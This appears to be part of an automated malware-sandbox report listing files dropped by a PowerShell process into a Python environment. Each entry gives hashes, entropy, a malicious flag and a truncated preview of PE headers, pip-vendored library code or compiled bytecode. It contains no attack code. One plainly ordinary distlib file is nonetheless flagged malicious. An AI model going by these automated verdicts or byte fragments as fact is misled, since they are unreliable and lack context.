                                                                                                                                                                                                                              SHA-512:0C9C6CC534AB5F0EDB3C86350C743A27D7F5DF67A6E568FC18994CFC6F60BA3064C238ADD45E0DF8F56A0390E0F4415603404BC499FDB9124A73B5F106EA97FA
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........L..-..-..-..F..-..F..3-..F..-...X..-...X..-...X..-..F..-..-...-...X..-...XW.-..-?.-...X..-..Rich.-..........PE..d......b.........."..........".......5.........@..........................................`..................................................'..P........T...p..................@.......T...............................8............................................text...l........................... ..`.rdata.............................@..@.data...H%...@......................@....pdata.......p.......(..............@..@.rsrc....T.......V...4..............@..@.reloc..@...........................@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):101888
                                                                                                                                                                                                                              Entropy (8bit):6.071619576674695
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:1536:AU4NcJg1Fmrvr7KATeTHGRZulWQHmhhleMfSJ6jBHAK3CGFfHYToDI:h4KIFmFTYGRMlTHFMaJ6Fx39fHYToD
                                                                                                                                                                                                                              MD5:D65D7AD7E65F344463755BB62D8EBF38
                                                                                                                                                                                                                              SHA1:34D3E30BCBF87581902409BF5F621F48C5FC2B10
                                                                                                                                                                                                                              SHA-256:7A319FFABA23A017D7B1E18BA726BA6C54C53D6446DB55F92AF53C279894F8AD
                                                                                                                                                                                                                              SHA-512:E9786F3E31D100AFBF2CE26B857214662080532632A3731D602C4539F5F11018C768F099363A91EDFECBA2116C04D2A6BE6859FEEE8C2B851360B77C7C82C2CE
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................g.*......d.......d.......d,.......!..............d.......d(......d/.....Rich....................PE..d......b.........."..................F.........@..........................................@.................................................8...P........S......................d....................................................................................text............................... ..`.rdata...9.......:..................@..@.data...0A...0......................@....pdata...............*..............@..@.rsrc....S.......T...6..............@..@.reloc..J...........................@..B................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):43958
                                                                                                                                                                                                                              Entropy (8bit):4.200360920732874
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:dYJmUXGVNCt1R0IzYin8wrK/zFGouJrENhIsZ7sHIWuNaPVo:dYJvXGNCt1i1in8SnXZE7hN4Vo
                                                                                                                                                                                                                              MD5:7A5F580723A0460FBF61958428F7AA46
                                                                                                                                                                                                                              SHA1:5B8872C699F85E2F02134CE1467923E9C3E65BCA
                                                                                                                                                                                                                              SHA-256:155402BDEF2EF8BD10624E7E61365CEECE1698D41DBE34564CAD3C297CD9557E
                                                                                                                                                                                                                              SHA-512:325E38C5743983823694FAD7E1EF9C35269C046AABA7E40476431FA7B97325C82B94DB35C0D9CD4461E8D6C5911467AC7B6B59182B774026777D29AA77B58264
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:# -*- coding: utf-8 -*-.#.# Copyright (C) 2013-2023 Vinay Sajip..# Licensed to the Python Software Foundation under a contributor agreement..# See LICENSE.txt and CONTRIBUTORS.txt..#.from __future__ import unicode_literals..import base64.import codecs.import datetime.from email import message_from_file.import hashlib.import json.import logging.import os.import posixpath.import re.import shutil.import sys.import tempfile.import zipfile..from . import __version__, DistlibException.from .compat import sysconfig, ZipFile, fsdecode, text_type, filter.from .database import InstalledDistribution.from .metadata import Metadata, WHEEL_METADATA_FILENAME, LEGACY_METADATA_FILENAME.from .util import (FileOperator, convert_path, CSVReader, CSVWriter, Cache,. cached_property, get_cache_base, read_exports, tempdir,. get_platform).from .version import NormalizedVersion, UnsupportedVersionError..logger = logging.getLogger(__name__)..cache = None # created when needed
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):981
                                                                                                                                                                                                                              Entropy (8bit):4.4626347231083
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:1+i0z8JpVKlbcczFnvXav62JxX96bGM4OfSpAW+D3u+KIzRg:Ei0z8JpVKlLVvXavVxX92J4OfSpAW+dq
                                                                                                                                                                                                                              MD5:5B9B7EFB166424292D033EB05B9DE265
                                                                                                                                                                                                                              SHA1:4A736116DA5E08DD8EC668E9768ACF14EAD0E823
                                                                                                                                                                                                                              SHA-256:D9F1E317E49F80FBE3C8D67588787FC23A96751FD8A393831F0642D232C13E17
                                                                                                                                                                                                                              SHA-512:9187EAC2226A7E91E9F7B9E4E9F3601D0F98FE0CD5B6CF10DF6A6B7EB5DB993EB06AA18F34FB25796A0612D12C1A8D3A6A29F8812F336A87BC5EC23981EED4DF
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:from .distro import (. NORMALIZED_DISTRO_ID,. NORMALIZED_LSB_ID,. NORMALIZED_OS_ID,. LinuxDistribution,. __version__,. build_number,. codename,. distro_release_attr,. distro_release_info,. id,. info,. like,. linux_distribution,. lsb_release_attr,. lsb_release_info,. major_version,. minor_version,. name,. os_release_attr,. os_release_info,. uname_attr,. uname_info,. version,. version_parts,.)..__all__ = [. "NORMALIZED_DISTRO_ID",. "NORMALIZED_LSB_ID",. "NORMALIZED_OS_ID",. "LinuxDistribution",. "build_number",. "codename",. "distro_release_attr",. "distro_release_info",. "id",. "info",. "like",. "linux_distribution",. "lsb_release_attr",. "lsb_release_info",. "major_version",. "minor_version",. "name",. "os_release_attr",. "os_release_info",. "uname_attr",. "uname_info",. "version",. "version_parts",.]..__version__ = __version__.
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):64
                                                                                                                                                                                                                              Entropy (8bit):3.9726780318460246
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:1LBB0VKBcq66LhAjpAaC:1LBB0VKBFAjpAaC
                                                                                                                                                                                                                              MD5:9BA2B2B4DFC91B521F07858FC5547A23
                                                                                                                                                                                                                              SHA1:BE9D6FCD0DEBF92EBEA7D4C5C0331F9482BA0C29
                                                                                                                                                                                                                              SHA-256:6EEF5DDD389FA0A72264572A441BB2815DC64AE4E19D50FF9B620AE1CCFDE95B
                                                                                                                                                                                                                              SHA-512:BB4A361BDF07E555319FFBFFDD483ED3EA6279449100B583024F6D371AC54861224595EE1FEE1DF6A0A83927B4F1203648CD65E988AA9AE6E444AE34AABB6683
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:from .distro import main..if __name__ == "__main__":. main().
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):943
                                                                                                                                                                                                                              Entropy (8bit):5.188660290643473
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:3BF+khvO2WIZ05YeW05/vQOy89KGOb89KKKNn3bNF:3BhvO2Wu05YL05/vQe9xB9i3hF
                                                                                                                                                                                                                              MD5:1D5F2BA41495D3E5D1BDD5A70387D08A
                                                                                                                                                                                                                              SHA1:89AAA3A75D29D8FB9444B601B6DE440E14545F6C
                                                                                                                                                                                                                              SHA-256:23929E023C302590919A930E3D35F7268030F1C32CBE280A90C6333CD9865759
                                                                                                                                                                                                                              SHA-512:8F5D5ABBC3674D085D9AADD705046DCA06FD4DF9A29F41942C2D42D2BF49600DA1EF06D246AF1E263AD3FECFCE854A9DB2D34570C529DE2F4AF6C30B1C582EAF
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf..........................x.....d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...g.d...Z.e.Z.y.)......)...NORMALIZED_DISTRO_ID..NORMALIZED_LSB_ID..NORMALIZED_OS_ID..LinuxDistribution..__version__..build_number..codename..distro_release_attr..distro_release_info..id..info..like..linux_distribution..lsb_release_attr..lsb_release_info..major_version..minor_version..name..os_release_attr..os_release_info..uname_attr..uname_info..version..version_parts).r....r....r....r....r....r....r....r....r....r....r....r....r....r....r....r....r....r....r....r....r....r....r....N)...distror....r....r....r....r....r....r....r....r....r....r....r....r....r....r....r....r....r....r....r....r....r....r....r......__all__........LC:\Users\xbov\Desktop\pyops\Lib\site-packages\pip/_vendor/distro/__init__.py..<module>r .......s6............................................6......4.....r....
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):275
                                                                                                                                                                                                                              Entropy (8bit):5.002627191322333
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:gtg/eaMlbJLX56/rti+uw52KNdAreaMgIanUa9t:gg/Y/5OwKNnaMNan1t
                                                                                                                                                                                                                              MD5:3C9F4DF7D12C4DCF5ED9CD25B05E8B56
                                                                                                                                                                                                                              SHA1:A6C8E5A06BB0EFEAE434D2F45F7DEE2D41DCACBB
                                                                                                                                                                                                                              SHA-256:5F63DA7716D2183C1DE3DD7CF9692D70EA30291ABCD4D208E767363503C55BDB
                                                                                                                                                                                                                              SHA-512:4460A9F9344D9476DBE5AECBD0E97C2BBC444FA738884F896A1FD83AACADC1235B2AF73AC95C8CCEC919F18C1413D37E5757B15B1FAEC535B8019D582D9E18F3
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf@.........................*.....d.d.l.m.Z...e.d.k(..r...e...........y.y.)......)...main..__main__N)...distror......__name__........LC:\Users\xbov\Desktop\pyops\Lib\site-packages\pip/_vendor/distro/__main__.py..<module>r........s................z.......F.....r....
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):53737
                                                                                                                                                                                                                              Entropy (8bit):5.37887127562718
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:lh8GTkHm8pqm9LtLaw22gz0SQtHy3F9in4448vCaINCvJ2tmvkgJgdUrI:lh7TQwmXLad2gz0p9CLl82tmFrI
                                                                                                                                                                                                                              MD5:FF21B7E29EFA7D3E0EF5E62FA6677BFB
                                                                                                                                                                                                                              SHA1:32165FCF6EAAF03B85B953E8452AA1B9E2046AF4
                                                                                                                                                                                                                              SHA-256:B04FC3C180B19176F1A4C57DD8CC2158F4F2BFA7FE6572ADF9F8C03C382D07DA
                                                                                                                                                                                                                              SHA-512:5A05F650FDECF59883E53E4BC281B76E066AAF09DF7E95C30F1A44A3A58A11757A439FB2DD2397237A905778B440F9FA1517442278227F334504A7FC00AAD668
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf...............................d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.....d.d.l.m.Z...d.Z...G.d...d.e.........Z...G.d...d.e.........Z.e.j4..................j7..................d.d.........Z.e.j4..................j7..................d.d.........Z.d.Z.d.d.d...Z.d.d.d.d.d.d...Z d.d.i.Z!..e.jD..................d.........Z#..e.jD..................d.........Z$g.d...Z%d.d.d.e.d.d.d.f.Z&d=d.e'd.e.e(e(e(f.....f.d ..Z)d.e(f.d!..Z*d>d"e'd.e(f.d#..Z+d?d"e'd$e'd.e(f.d%..Z,d>d$e'd.e.e(e(e(f.....f.d&..Z-d>d$e'd.e(f.d'..Z.d>d$e'd.e(f.d(..Z/d>d$e'd.e(f.d)..Z0d.e(f.d*..Z1d.e(f.d+..Z2d?d"e'd$e'd.e.f.d,..Z3d.e.e(e(f.....f.d-..Z4d.e.e(e(f.....f.d...Z5d.e.e(e(f.....f.d/..Z6d.e.e(e(f.....f.d0..Z7d1e(d.e(f.d2..Z8d1e(d.e(f.d3..Z9d1e(d.e(f.d4..Z:d1e(d.e(f.d5..Z;..d.d6l<m=Z=....G.d9..d:........Z>..e>........Z?d@d;..Z@eAd<k(..r...e@..........y.y.#.e.$.r...e.Z.Y....~w.x.Y.w.#.e.$.r.....G.d7..d8........Z=Y..Bw.x.Y.w.)Aa.....
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):49330
                                                                                                                                                                                                                              Entropy (8bit):4.498461635586493
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:KzkDOBOmopP81U81ULtLaET2PMFsPdSJCPOiYAorJa7NEVsboKRtHJw7f1A53ihW:KzFBOBSgLaaLET9w7tA9ihW
                                                                                                                                                                                                                              MD5:32070F033F9D7BB7333A58B02C57BC70
                                                                                                                                                                                                                              SHA1:B64D63A45C1400EB086940C2CEAC1EF1E8C356B3
                                                                                                                                                                                                                              SHA-256:5193B52E3221B4508C7656E2CF7F608F7ADA57E0267F7481C331B37C0A62307C
                                                                                                                                                                                                                              SHA-512:475ACF3F9D7F13DD0A11CD5AAC271BFCC74356E1999A802D79105CE1CBD6ADE0F103DC4E412A54BCA30F238A6819BEA8B7B66015885FB41EA699FAE2676A3D67
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:#!/usr/bin/env python.# Copyright 2015,2016,2017 Nir Cohen.#.# Licensed under the Apache License, Version 2.0 (the "License");.# you may not use this file except in compliance with the License..# You may obtain a copy of the License at.#.# http://www.apache.org/licenses/LICENSE-2.0.#.# Unless required by applicable law or agreed to in writing, software.# distributed under the License is distributed on an "AS IS" BASIS,.# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied..# See the License for the specific language governing permissions and.# limitations under the License...""".The ``distro`` package (``distro`` stands for Linux Distribution) provides.information about the Linux distribution it runs on, such as a reliable.machine-readable distro ID, or version information...It is the recommended replacement for Python's original.:py:func:`platform.linux_distribution` function, but it provides much more.functionality. An alternative implementation became necessary b
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):849
                                                                                                                                                                                                                              Entropy (8bit):4.515992645856183
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:1bEveEaF+vqnuZ9UeAlDwdsyGF66xorAqv:tLcqwdsye66+rf
                                                                                                                                                                                                                              MD5:3159DCDF671A44354EB58EB6FFB4CBEA
                                                                                                                                                                                                                              SHA1:77EA165E2CDEF8A14C86F5480659B4515783A0BB
                                                                                                                                                                                                                              SHA-256:28940DD5E401AFC8882B948AAC9E3B957BF11B4049ECB9B7F16E334F4BFFF259
                                                                                                                                                                                                                              SHA-512:3DC2EFB6DB3EBF5C61401E2125060D0C82078907E4DD55C2346517578739B76A8A9C8940C87B61242928F02A8A0B6349B8951CE6EA82ACEAC19CC29CCCA1E41B
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:from .package_data import __version__.from .core import (. IDNABidiError,. IDNAError,. InvalidCodepoint,. InvalidCodepointContext,. alabel,. check_bidi,. check_hyphen_ok,. check_initial_combiner,. check_label,. check_nfc,. decode,. encode,. ulabel,. uts46_remap,. valid_contextj,. valid_contexto,. valid_label_length,. valid_string_length,.).from .intranges import intranges_contain..__all__ = [. "IDNABidiError",. "IDNAError",. "InvalidCodepoint",. "InvalidCodepointContext",. "alabel",. "check_bidi",. "check_hyphen_ok",. "check_initial_combiner",. "check_label",. "check_nfc",. "decode",. "encode",. "intranges_contain",. "ulabel",. "uts46_remap",. "valid_contextj",. "valid_contexto",. "valid_label_length",. "valid_string_length",.].
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):864
                                                                                                                                                                                                                              Entropy (8bit):5.2142171904056775
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:t1PVZjJRL/whvOcAZ/Qb8plAQb89u4KNnaTYpEEEIY:t/ZnL/Fc+ob9ciYpEEEIY
                                                                                                                                                                                                                              MD5:52B664E3482E14112A55C45E8DD85168
                                                                                                                                                                                                                              SHA1:751B16130DEA58404EE6BF2A9F1D1019FC061F76
                                                                                                                                                                                                                              SHA-256:9A0E298EC6A5AC19164FAFE658F5459890E1ACF5FA9E03C06252564F8361C8D4
                                                                                                                                                                                                                              SHA-512:9877BE82334CF5527CFEAF658AFFBD5D729598A18AF7FD1950DD78F7F778BA9BA18259C415CA666E763C644773CC10430A4AF5F63D5B1AD7B5BAED956B7F9515
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.VfQ.........................t.....d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...g.d...Z.y.)......)...__version__)...IDNABidiError..IDNAError..InvalidCodepoint..InvalidCodepointContext..alabel..check_bidi..check_hyphen_ok..check_initial_combiner..check_label..check_nfc..decode..encode..ulabel..uts46_remap..valid_contextj..valid_contexto..valid_label_length..valid_string_length)...intranges_contain).r....r....r....r....r....r....r....r....r....r....r....r....r....r....r....r....r....r....r....N)...package_datar......corer....r....r....r....r....r....r....r....r....r....r....r....r....r....r....r....r....r......intrangesr......__all__........JC:\Users\xbov\Desktop\pyops\Lib\site-packages\pip/_vendor/idna/__init__.py..<module>r........s-..........%..........................(..).......r....
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4616
                                                                                                                                                                                                                              Entropy (8bit):5.116603497036815
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:Dpmr6BWrJmqvXbiHNW6dFMg/4ATvWlkEha53P2TZfi4OfW1Y2TZOqaGCXeoQpwRy:DO6YIBxYATvW+Ua5SOfW9YMw1DxgjJN
                                                                                                                                                                                                                              MD5:CC1633BAF9C9DC67A296311DA4366937
                                                                                                                                                                                                                              SHA1:D8C4311086A945F729FF4ADB40DA7E1F5F61CFFE
                                                                                                                                                                                                                              SHA-256:34788ABDBC016481F143938B7479F37A3DEBF1977A1EF1F066C1AA6F59A23CBA
                                                                                                                                                                                                                              SHA-512:E4F249A09240D34EFC74B19419DAF1382E66AA59559D66657315C5CDFFE666775AE2D4F9E59425245563E3B5CEF4B777AAD72BB326DA9FC2B29E77F4E816DBF0
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf..........................Z.....d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.....e.j...................d.........Z...G.d...d.e.j...........................Z...G.d...d.e.j...........................Z...G.d...d.e.j ..........................Z...G.d...d.e.e.j$..........................Z...G.d...d.e.e.j&..........................Z.d.e.j(..................f.d...Z.y.)......)...encode..decode..alabel..ulabel..IDNAError.....N)...Tuple..Optionalu....[....]c.....................L.....e.Z.d.Z.d.d.e.d.e.d.e.e.e.f.....f.d...Z.d.d.e.d.e.d.e.e.e.f.....f.d...Z.y.)...Codec..data..errors..returnc.....................r.....|.d.k7..r.t.........d.j...................|...................|.s.y.t.........|.........t.........|.........f.S.).N..strict..Unsupported error handling "{}")......r....).r......formatr......len....selfr....r....s.... .GC:\Users\xbov\Desktop\pyops\Lib\site-packages\pip/_vendor/idna/codec.pyr....z.Codec.encode....s:.........X........?..F..F.v..N..O..O....
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):870
                                                                                                                                                                                                                              Entropy (8bit):4.998116374929632
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:OdFw8rNpKNnErs/WZojxfto3v4I8+F4Q2af/oZRFO:s1WvWeNftowaYXY
                                                                                                                                                                                                                              MD5:0D8CF9C2395C8AC745D604B2EA6C18C7
                                                                                                                                                                                                                              SHA1:8F18C6240B37EE5338E0E7CE51D5B38DCFCBC462
                                                                                                                                                                                                                              SHA-256:7C75820115E61E5A545AF5371EE7ED9BFE35A17E6AA500341EFEA4D45F6D8C84
                                                                                                                                                                                                                              SHA-512:3B748DB70D05762D753F3C61B86F6210C70F5749F51D65508BC991CA8861B912FFCE733C6193501D36ABAC22E55E9457EB5DB02B3A4336DC56A127E9893D8108
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.VfA.........................b.....d.d.l.....d.d.l.....d.d.l.m.Z.m.Z...d.e.d.e.f.d...Z.d.e.e.e.f.....d.e.f.d...Z.d.e.d.d.f.d...Z.y.)......)...*.....)...Any..Union..label..returnc...........................t.........|.........S...N)...encode..r....s.... .HC:\Users\xbov\Desktop\pyops\Lib\site-packages\pip/_vendor/idna/compat.py..ToASCIIr...................%.=........c...........................t.........|.........S.r....)...decoder....s.... r......ToUnicoder........r....r......sNc...........................t.........d...........).Nz,IDNA 2008 does not utilise nameprep protocol)...NotImplementedError).r....s.... r......nameprepr........s...........L..M..Mr....)...core..codec..typingr....r......str..bytesr......bytearrayr....r......r....r......<module>r........sT.......................3......5...........U.5.)..+..,................N.......N.......N.r....
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):16265
                                                                                                                                                                                                                              Entropy (8bit):5.39702044076636
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:KuX9ecLds8dyjGK4FEreavdYkuo4jC5xCfsDZdSTp:KUlds8/KTe+rcC5xCfgZdS9
                                                                                                                                                                                                                              MD5:FE9383551B99128508F61A2E08DC6EE3
                                                                                                                                                                                                                              SHA1:959698A316258863AB3E4AEA78A98BD0AF2D776A
                                                                                                                                                                                                                              SHA-256:4FCA598B25B5EC7478F6E4C9BF20A635B015CA6AA48BEDCDD66087FF0BE74743
                                                                                                                                                                                                                              SHA-512:29AEA03D5F44719E75548F49A69FCA4DFB4C91FA8D4BCD0E90B5ED84E3E3F146C1421489CE67B96E57C7CC7A00ABCF73C45ECAC88BC9BC27CB6AA7920401A4AD
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf.2........................r.....d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z...d.Z.d.Z...e.j...................d.........Z...G.d...d.e.........Z...G.d...d.e.........Z...G.d...d.e.........Z...G.d...d.e.........Z.d.e.d.e.f.d...Z.d.e.d.e.d.e.f.d...Z.d.e.d.e.f.d...Z.d.e.d.e.f.d...Z.d.e.e.e.f.....d.e.f.d...Z.d.e.e.e.f.....d.e.d.e.f.d...Z.d1d.e.d.e.d.e.f.d...Z.d.e.d.e.f.d...Z.d.e.d.e.f.d ..Z.d.e.d.d.f.d!..Z d.e.d"e.d.e.f.d#..Z!d1d.e.d"e.d$e.d.e.f.d%..Z"d.e.e.e.e#f.....d.d.f.d&..Z$d.e.d.e.f.d'..Z%d.e.e.e.e#f.....d.e.f.d(..Z&d2d)e.d*e.d+e.d.e.f.d,..Z'd3d.e.e.e.e#f.....d-e.d.e.d*e.d+e.d.e.f.d/..Z(d4d.e.e.e.e#f.....d-e.d.e.d*e.d.e.f.d0..Z)y.)5.....)...idnadata.....N)...Union..Optional)...intranges_contain.....s....xn--u....[....]c...........................e.Z.d.Z.d.Z.y.)...IDNAErrorz7 Base exception for all IDNA-encoding related problems N....__name__..__module__..__qualname__..__doc__........FC:\Users\xbov\Desktop\pyops\Lib\site-packages\pip/_vendor/idna/core
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):38365
                                                                                                                                                                                                                              Entropy (8bit):5.471181643882948
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:AyN+3OC7BOUjWvJuDYcWaP+aQXUjM4B+MqS07o4ZK8E0:Aj3OMThDY5aEUY4UJSwou+0
                                                                                                                                                                                                                              MD5:BE26BC78CB4724DD1D11200CE54450E5
                                                                                                                                                                                                                              SHA1:D74631912CA237E7FE920C1F2ED9DE4E57251AE9
                                                                                                                                                                                                                              SHA-256:C14631FD1D7193ADC21B9AAB86D5E737DD98C8B3DC2EF6E1D919E493B4D3796C
                                                                                                                                                                                                                              SHA-512:BC8988A82CAF1AEFE5D7A326F4EB7DE6DDC86D13A4589479679C61A29832FE54799DBAEB4033B7A371959C8660833A54A5A0310D6FEE745E5DD2595DC31C83D7
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.VfW..............................d.Z.d.d.d.d.d.d...Z.i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...i.d.d...d.d...d.d...d.d...d.d...d d...d!d...d"d...d#d...d$d...d%d...d&d...d'd...d(d...d)d...d*d...d+d.....i.d,d...d-d...d.d...d/d...d0d...d1d...d2d3..d4d...d5d...d6d...d7d...d8d...d9d...d:d...d;d...d<d...d=d.....i.d>d...d?d...d@d...dAd...dBd...dCd...dDd...dEd...dFd...dGd...dHd...dId...dJd...dKd...dLd...dMd...dNd.....i.dOd...dPd...dQd...dRd...dSd...dTd...dUd...dVd...dWd...dXd...dYd...dZd...d[d...d\d...d]d...d^d...d_d.....i.d`d...dad...dbd...dcd...ddd...ded...dfd...dgd...dhd...did...djd...dkd...dld...dmd...dnd...dod...dpd.....i.dqd...drd...dsd...dtd...dud...dvd...dwd...dxd...dyd...dzd...d{d...d|d...d}d...d~d...d.d...d.d...d.d.....i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d.....i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d.
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2621
                                                                                                                                                                                                                              Entropy (8bit):5.581282380603837
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:hw6AJrOioJerYy/ORh7BPF8hHDa3XTWzFt7t2y1uOl8y7b1Pca:jq7CBPChH+nSpt7t2y1biq
                                                                                                                                                                                                                              MD5:C7F2CAD8FB62522DC5A171FDB5A576BA
                                                                                                                                                                                                                              SHA1:3AE44B8D35111C94E655D40765264E40DB449D79
                                                                                                                                                                                                                              SHA-256:D6081D0A482B51E2A50807C621E5B87AC0CD4A32C923675006499CD38178E064
                                                                                                                                                                                                                              SHA-512:D26F5CFC4245BF717CE6ABB0FC558AB16EA0BFD3459C16F00AF473DAA829E5A7E82CF2815E2EDB920A3173A1A52B35C67ACB6AA9EAAD47AA9D08A59D11344933
                                                                                                                                                                                                                              Malicious:false
